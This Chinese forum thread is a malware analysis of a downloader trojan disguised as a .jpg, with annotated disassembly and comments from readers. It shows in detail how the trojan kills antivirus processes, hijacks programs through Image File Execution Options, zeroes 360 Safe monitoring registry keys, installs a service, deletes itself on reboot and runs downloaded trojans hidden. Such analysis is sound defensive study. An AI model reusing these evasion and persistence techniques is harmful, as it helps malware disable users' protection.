一个下载者分析
本帖最后由 qiang 于 2010-7-16 10:47 编辑文件: C:\WINDOWS\system32\sadfasdf.jpg
大小: 34816 字节
文件版本: 1, 0, 0, 1
修改时间: 2010年7月14日, 14:32:54
MD5: 91846723B592208AEBE7852C5CDCAAA5
SHA1: 460ABC9410C05CC04F152381B14EA9BB81507F6F
采用“UPX”加壳方式,在系统目录C:\WINDOWS\system32伪装成jpg文件格式,
脱壳往下拉00417D50 83C3 04 add ebx, 4
00417D53 ^ EB E1 jmp short 00417D36
00417D55 FF96 E0730100 call dword ptr
00417D5B 61 popad
00417D5C ^ E9 FBBCFFFF jmp 00413A5C
在00417D5C ^ E9 FBBCFFFF jmp 00413A5C按F2下断点,按F9运行,在按F7来到入口点。被执行后,释放名为“78767551”的文件到%Temp%目录下,遍历查找安全软件进程,找到后尝试将其结束,达到自身保护目的00413A5C > /E8 85FFFFFF call 004139E6
00413A61 . |83F8 0A cmp eax, 0A
00413A64 . |72 74 jb short 00413ADA
00413A66 . |68 10234100 push 00412310 ; /MutexName = "iiopoip" //创建一个名为iiopoip的互斥量
00413A6B . |6A 01 push 1 ; |InitialOwner = TRUE
00413A6D . |6A 00 push 0 ; |pSecurity = NULL
00413A6F . |FF15 80104000 call dword ptr ; \CreateMutexA
00413A75 . |FF15 7C104000 call dword ptr ; ntdll.RtlGetLastWin32Error
00413A7B . |3D B7000000 cmp eax, 0B7
00413A80 . |75 08 jnz short 00413A8A
00413A82 . |6A 00 push 0 ; /ExitCode = 0
00413A84 . |FF15 78104000 call dword ptr ; \ExitProcess
00413A8A > |56 push esi
00413A8B . |BE 283C4100 mov esi, 00413C28
00413A90 . |56 push esi ; /Buffer => sadfasdf.00413C28
00413A91 . |68 04010000 push 104 ; |BufSize = 104 (260.)
00413A96 . |FF15 94104000 call dword ptr ; \GetTempPathA 获取系统临时目录
00413A9C . |68 04234100 push 00412304 ; /StringToAdd = "78767551"
00413AA1 . |56 push esi ; |ConcatString => ""
00413AA2 . |FF15 58104000 call dword ptr ; \lstrcatA //字符串连接得到C:\DOCUME~1\safe\LOCALS~1\Temp\78767551
00413AA8 . |56 push esi
00413AA9 . |E8 B2FDFFFF call 00413860 //这个函数作用释放名为“78767551”的文件到Temp目录下
00413AAE . |59 pop ecx
00413AAF . |5E pop esi
00413AB0 . |84C0 test al, al
00413AB2 . |74 05 je short 00413AB9
00413AB4 . |E8 47FCFFFF call 00413700 关键call 1
00413AB9 > |B8 A03E4100 mov eax, 00413EA0
00413ABE . |6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
00413AC0 . |50 push eax ; |Title => ""
00413AC1 . |50 push eax ; |Text => ""
00413AC2 . |6A FF push -1 ; |hOwner = FFFFFFFF
00413AC4 . |FF15 04114000 call dword ptr ; \MessageBoxA
00413ACA . |68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
00413ACF . |FF15 8C104000 call dword ptr ; \Sleep
00413AD5 . |E8 45FEFFFF call 0041391F
00413ADA > |33C0 xor eax, eax
00413ADC . |C3 retn关键call 100413700 /$ E8 DBFEFFFF call 004135E0 //call 2创建进程快照,遍历查找安全软件进程,里面有个字符解密函数
00413705 |. 84C0 test al, al
00413707 |. 74 10 je short 00413719
00413709 |. E8 72FAFFFF call 00413180
0041370E |. 68 30750000 push 7530 ; /Timeout = 30000. ms
00413713 |. FF15 8C104000 call dword ptr ; \Sleep
00413719 |> E8 92F8FFFF call 00412FB0 //call 3
0041371E |. 33C0 xor eax, eax
00413720 \. C3 retncall 2进去后00413657 |. E8 D4FEFFFF ||call 00413530 //字符串解密函数,第一次解密出来的字符串是"kavstart.exe",后面有kissvc.exe,kmailmom.exe等
0041365C |. 83C4 04 ||add esp, 4
0041365F |> 8D5424 3C ||lea edx, dword ptr
00413663 |. 56 ||push esi ; /String2
00413664 |. 52 ||push edx ; |String1
00413665 |. FF15 5C104000 ||call dword ptr ; \lstrcmpiA //kavstart.exe和系统进程比较在注册表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下添加下列项,进行劫持指定名称的程序:
avp.exe
Thunder5.exe
键值均为:debugger
数据均指向:svchost.exe00413730 /$ 81EC FC000000 sub esp, 0FC
00413736 |. 8B0D B8224100 mov ecx, dword ptr
0041373C |. 56 push esi
0041373D |. 57 push edi
0041373E |. 894C24 10 mov dword ptr , ecx
00413742 |. B9 12000000 mov ecx, 12
00413747 |. BE 68224100 mov esi, 00412268 ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
0041374C |. 8D7C24 30 lea edi, dword ptr
00413750 |. A1 B4224100 mov eax, dword ptr
00413755 |. F3:A5 rep movs dword ptr es:, dword pt>
00413757 |. 66:A5 movs word ptr es:, word ptr [esi>
00413759 |. 894424 0C mov dword ptr , eax
0041375D |. 33C0 xor eax, eax
0041375F |. 894424 18 mov dword ptr , eax
00413763 |. 33C9 xor ecx, ecx
00413765 |. A4 movs byte ptr es:, byte ptr [esi>
00413766 |. 894424 1C mov dword ptr , eax
0041376A |. 894C24 7B mov dword ptr , ecx
0041376E |. 894424 20 mov dword ptr , eax
00413772 |. 894C24 7F mov dword ptr , ecx
00413776 |. 894424 24 mov dword ptr , eax
0041377A |. 898C24 83000000 mov dword ptr , ecx
00413781 |. 894424 28 mov dword ptr , eax
00413785 |. 66:898C24 87000>mov word ptr , cx
0041378D |. 66:894424 2C mov word ptr , ax
00413792 |. 888C24 89000000 mov byte ptr , cl
00413799 |. 888C24 8C000000 mov byte ptr , cl
004137A0 |. B9 1D000000 mov ecx, 1D
004137A5 |. 8DBC24 8D000000 lea edi, dword ptr
004137AC |. 884424 2E mov byte ptr , al
004137B0 |. 8B15 BC224100 mov edx, dword ptr
004137B6 |. F3:AB rep stos dword ptr es:
004137B8 |. 66:AB stos word ptr es:
004137BA |. 895424 14 mov dword ptr , edx
004137BE |. 8D5424 30 lea edx, dword ptr
004137C2 |. AA stos byte ptr es:
004137C3 |. 8D8424 8C000000 lea eax, dword ptr
004137CA |. 52 push edx ; /String2
004137CB |. 50 push eax ; |String1
004137CC |. FF15 54104000 call dword ptr ; \lstrcpyA
004137D2 |. 8B8C24 08010000 mov ecx, dword ptr
004137D9 |. 8D9424 8C000000 lea edx, dword ptr
004137E0 |. 51 push ecx ; /StringToAdd
004137E1 |. 52 push edx ; |ConcatString
004137E2 |. FF15 58104000 call dword ptr ; \lstrcatA
004137E8 |. 8D4424 08 lea eax, dword ptr
004137EC |. 8D8C24 8C000000 lea ecx, dword ptr
004137F3 |. 50 push eax ; /pHandle
004137F4 |. 51 push ecx ; |Subkey
004137F5 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004137FA |. FF15 0C104000 call dword ptr ; \RegCreateKeyA
00413800 |. 8D5424 0C lea edx, dword ptr
00413804 |. 52 push edx ; /String
00413805 |. FF15 68104000 call dword ptr ; \lstrlenA
0041380B |. 8B4C24 08 mov ecx, dword ptr
0041380F |. 40 inc eax
00413810 |. 50 push eax ; /BufSize
00413811 |. 8D4424 10 lea eax, dword ptr ; |
00413815 |. 50 push eax ; |Buffer
00413816 |. 6A 01 push 1 ; |ValueType = REG_SZ
00413818 |. 6A 00 push 0 ; |Reserved = 0
0041381A |. 68 5C224100 push 0041225C ; |Debugger
0041381F |. 51 push ecx ; |hKey
00413820 |. FF15 10104000 call dword ptr ; \RegSetValueExA
00413826 |. 8B5424 08 mov edx, dword ptr
0041382A |. 52 push edx ; /hKey
0041382B |. FF15 14104000 call dword ptr ; \RegCloseKey
00413831 |. 5F pop edi
00413832 |. 33C0 xor eax, eax
00413834 |. 5E pop esi
00413835 |. 81C4 FC000000 add esp, 0FC
0041383B \. C3 retn进入call 300412FB0 /$ 81EC 30010000 sub esp, 130
00412FB6 |. 55 push ebp
00412FB7 |. 68 0CBD4000 push 0040BD0C ; ASCII "safeboxTray.exe"
00412FBC |. E8 AFFAFFFF call <字符处理函数>
00412FC1 |. 68 1CBD4000 push 0040BD1C ; ASCII "360tray.exe"
00412FC6 |. E8 A5FAFFFF call <字符处理函数>
00412FCB |. 68 28BD4000 push 0040BD28 ; ASCII "psapi.dll"
00412FD0 |. E8 9BFAFFFF call <字符处理函数>
00412FD5 |. 68 34BD4000 push 0040BD34 ; ASCII " /u"
00412FDA |. E8 91FAFFFF call <字符处理函数>
00412FDF |. 83C4 10 add esp, 10
00412FE2 |. 6A 00 push 0 ; /ProcessID = 0
00412FE4 |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00412FE6 |. E8 FF0A0000 call 00413AEA ; \CreateToolhelp32Snapshot
00412FEB |. 8BE8 mov ebp, eax
00412FED |. 83FD FF cmp ebp, -1
00412FF0 |. 0F84 71010000 je 00413167
00412FF6 |. 8D4424 0C lea eax, dword ptr
00412FFA |. 56 push esi
00412FFB |. 50 push eax ; /lppe
00412FFC |. 55 push ebp ; |hSnapshot
00412FFD |. C74424 18 28010>mov dword ptr , 128 ; |
00413005 |. E8 DA0A0000 call 00413AE4 ; \Process32First
0041300A |. 85C0 test eax, eax
0041300C |. 0F84 2F010000 je 00413141
00413012 |. 8B35 5C104000 mov esi, dword ptr ; kernel32.lstrcmpiA
00413018 |. 8D4C24 34 lea ecx, dword ptr
0041301C |. 68 0CBD4000 push 0040BD0C ; /String2 = "safeboxTray.exe"
00413021 |. 51 push ecx ; |String1
00413022 |. FFD6 call esi ; \lstrcmpiA
00413024 |. 85C0 test eax, eax
00413026 |. 74 23 je short 0041304B
00413028 |> 8D5424 10 /lea edx, dword ptr
0041302C |. 52 |push edx ; /lppe
0041302D |. 55 |push ebp ; |hSnapshot
0041302E |. E8 AB0A0000 |call 00413ADE ; \Process32Next
00413033 |. 85C0 |test eax, eax
00413035 |. 0F84 06010000 |je 00413141 //没找到就调走到00413141地址
0041303B |. 8D4424 34 |lea eax, dword ptr
0041303F |. 68 0CBD4000 |push 0040BD0C ; ASCII "safeboxTray.exe"
00413044 |. 50 |push eax
00413045 |. FFD6 |call esi
00413047 |. 85C0 |test eax, eax
00413049 |.^ 75 DD \jnz short 00413028 //判断系统中是否存在safeboxTray.exe,没找到继续往上,存在往下执行
0041304B |> \8B4C24 18 mov ecx, dword ptr
0041304F |. 53 push ebx
00413050 |. 51 push ecx ; /ProcessId
00413051 |. 6A 00 push 0 ; |Inheritable = FALSE
00413053 |. 68 10040000 push 410 ; |Access = VM_READ|QUERY_INFORMATION
00413058 |. FF15 34104000 call dword ptr ; \OpenProcess //打开进程,后面关闭进程00413113 |. E8 78FBFFFF call 00412C90
00413118 |. E8 93F9FFFF call 00412AB0 //这个call进去是修改下列360注册表相关键值
0041311D |. E8 4EFEFFFF call 00412F70 //删除某个文件,具体哪个不太清楚
00413122 |. E8 A9FAFFFF call 00412BD0 修改下列360注册表相关键值,关闭360监控保护自身:
项:
HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon
键值: ExecAccess
指向数据:0
键值: MonAccess
指向数据:0
键值: LeakShowed
指向数据:0
键值: SiteAccess
指向数据:0
键值: UDiskAccess
指向数据:0
键值: weeken
指向数据:0
调用带“DELAY_UNTIL_REBOOT”标志参数的系统API函数“MoveFileEx”来实现下次系统启动后病毒的自删除,生成一个名为“iiopoip”的互斥体,防止自身的再次调用,并创建
下列的“Kisstusb”服务:
项:
HKLM\SYSTEM\CurrentControlSet\Services\Kisstusb
键值:DisplayName
指向数据:Kisstusb
健值:ImagePath
指向数据:%Temp%\787675510041391F /$ 55 push ebp
00413920 |. 8BEC mov ebp, esp
00413922 |. 81EC 24010000 sub esp, 124
00413928 |. 56 push esi
00413929 |. 57 push edi
0041392A |. 8D85 DCFEFFFF lea eax,
00413930 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00413935 |. 33F6 xor esi, esi ; |
00413937 |. 50 push eax ; |PathBuffer
00413938 |. 56 push esi ; |hModule => NULL
00413939 |. FF15 70104000 call dword ptr ; \GetModuleFileNameA
0041393F |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00413941 |. 8D85 DCFEFFFF lea eax, ; |
00413947 |. 56 push esi ; |NewName => NULL
00413948 |. 50 push eax ; |ExistingName
00413949 |. FF15 50104000 call dword ptr ; \MoveFileExA //实现下次系统启动后病毒的自删除
0041394F |. E8 2EFBFFFF call 00413482
00413954 |. 68 283C4100 push 00413C28 ; C:\DOCUME~1\safe\LOCALS~1\Temp\78767551
00413959 |. E8 62FFFFFF call 004138C0 //创建“Kisstusb”服务,再调用实现对服务关闭后删除“78767551”文件,并调用API函数
“SHDeleteKeyA”删除注册表中“Kisstusb”服务相关项实现对该服务的清除
0041395E |. 59 pop ecx
0041395F |. 56 push esi ; /hTemplateFile
00413960 |. 56 push esi ; |Attributes
00413961 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00413963 |. 56 push esi ; |pSecurity
00413964 |. 56 push esi ; |ShareMode
00413965 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
0041396A |. 68 F8224100 push 004122F8 ; |\\.\Delkil
0041396F |. FF15 A8104000 call dword ptr ; \CreateFileA
00413975 |. 8BF8 mov edi, eax
00413977 |. 83FF FF cmp edi, -1
0041397A |. 74 1D je short 00413999
0041397C |. 8D45 FC lea eax,
0041397F |. 56 push esi ; /pOverlapped
00413980 |. 50 push eax ; |pBytesReturned
00413981 |. 56 push esi ; |OutBufferSize
00413982 |. 56 push esi ; |OutBuffer
00413983 |. 68 002A0000 push 2A00 ; |InBufferSize = 2A00 (10752.)
00413988 |. 68 30E84000 push 0040E830 ; |InBuffer = sadfasdf.0040E830
0041398D |. 68 1C002200 push 22001C ; |IoControlCode = 22001C
00413992 |. 57 push edi ; |hDevice
00413993 |. FF15 6C104000 call dword ptr ; \DeviceIoControl
00413999 |> 57 push edi ; /hObject
0041399A |. FF15 B4104000 call dword ptr ; \CloseHandle
004139A0 |. 68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
004139A5 |. FF15 8C104000 call dword ptr ; \Sleep
004139AB |. E8 43FAFFFF call 004133F3 //
释放一个随机名称的动态链接库文件到%Temp%目录下,这里是5e41b2.dll,该文件用来实现隐藏运行下载下来的木马,
004139B0 |. 8B3D 00114000 mov edi, dword ptr ; user32.GetMessageA
004139B6 |. 56 push esi
004139B7 |. 56 push esi
004139B8 |. 8D45 E0 lea eax,
004139BB |. 56 push esi
004139BC |. 50 push eax
004139BD |> FFD7 /call edi
004139BF |. 85C0 |test eax, eax
004139C1 |. 74 1D |je short 004139E0
004139C3 |. 8D45 E0 |lea eax,
004139C6 |. 50 |push eax ; /pMsg
004139C7 |. FF15 FC104000 |call dword ptr ; \TranslateMessage
004139CD |. 8D45 E0 |lea eax,
004139D0 |. 50 |push eax ; /pMsg
004139D1 |. FF15 F8104000 |call dword ptr ; \DispatchMessageA
004139D7 |. 56 |push esi
004139D8 |. 56 |push esi
004139D9 |. 8D45 E0 |lea eax,
004139DC |. 56 |push esi
004139DD |. 50 |push eax
004139DE |.^ EB DD \jmp short 004139BD
004139E0 |> 5F pop edi
004139E1 |. 33C0 xor eax, eax
004139E3 |. 5E pop esi
004139E4 |. C9 leave
004139E5 \. C3 retn时间有限,先大体流程写到这,在完善,还望大家指教。
解压密码ggsafe。 用代码框编辑下吧,那样会更加美观. 分析的挺精彩的! 学习了。谢谢。 不错,分析的很详细的 支持啊,下来学习一下 冒似5e41b2.dll才是关键所在,为何不一块分析出来! 学习了 做成视频吧 看起来没那么痛苦 LZ知道的太多了。。。 最好麻烦LZ做个视频。。 看起来容易点。。:loveliness: 不错 本帖最后由 qiang 于 2010-7-16 10:59 编辑
回复 7# riusksk
应楼下同志要求5e41b2.dll分析
下面给出分析,5e41b2.dll主要有两个函数
入口点的函数是一个MessageBoxA,作用:木马作者为了调试使用,类似于用Dbgview.exe看调试信息,作者编译时让句柄无效不显示。
10001040 5e41b2.>/$ 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
10001042 |. 68 04300010 push 10003004 ; |Title = "x"
10001047 |. 68 00300010 push 10003000 ; |Text = "5"
1000104C |. 6A FC push -4 ; |hOwner = FFFFFFFC
1000104E |. FF15 08200010 call dword ptr [<&USER32.MessageBoxA>; \MessageBoxA
10001054 |. B8 01000000 mov eax, 1
10001059 \. C2 0C00 retn 0C另一个是Winext函数,作用:这个是用隐藏命令行方式运行下载回来的木马。
10001000 5e41b2.>/$ 56 push esi
10001001 |. 57 push edi
10001002 |. 8B7C24 0C mov edi, dword ptr
10001006 |. 83C9 FF or ecx, FFFFFFFF
10001009 |. 33C0 xor eax, eax
1000100B |. 6A 05 push 5 ; /ShowState = SW_SHOW
1000100D |. F2:AE repne scas byte ptr es: ; |
1000100F |. F7D1 not ecx ; |
10001011 |. 2BF9 sub edi, ecx ; |
10001013 |. 68 08300010 push 10003008 ; |CmdLine = ""
10001018 |. 8BC1 mov eax, ecx ; |
1000101A |. 8BF7 mov esi, edi ; |
1000101C |. BF 08300010 mov edi, 10003008 ; |
10001021 |. C1E9 02 shr ecx, 2 ; |
10001024 |. F3:A5 rep movs dword ptr es:, dword p>; |
10001026 |. 8BC8 mov ecx, eax ; |
10001028 |. 83E1 03 and ecx, 3 ; |
1000102B |. F3:A4 rep movs byte ptr es:, byte ptr>; |
1000102D |. FF15 00200010 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec
10001033 |. 5F pop edi
10001034 |. B0 01 mov al, 1
10001036 |. 5E pop esi
10001037 \. C3 retn还请大家多多提意见。 学习下
页:
[1]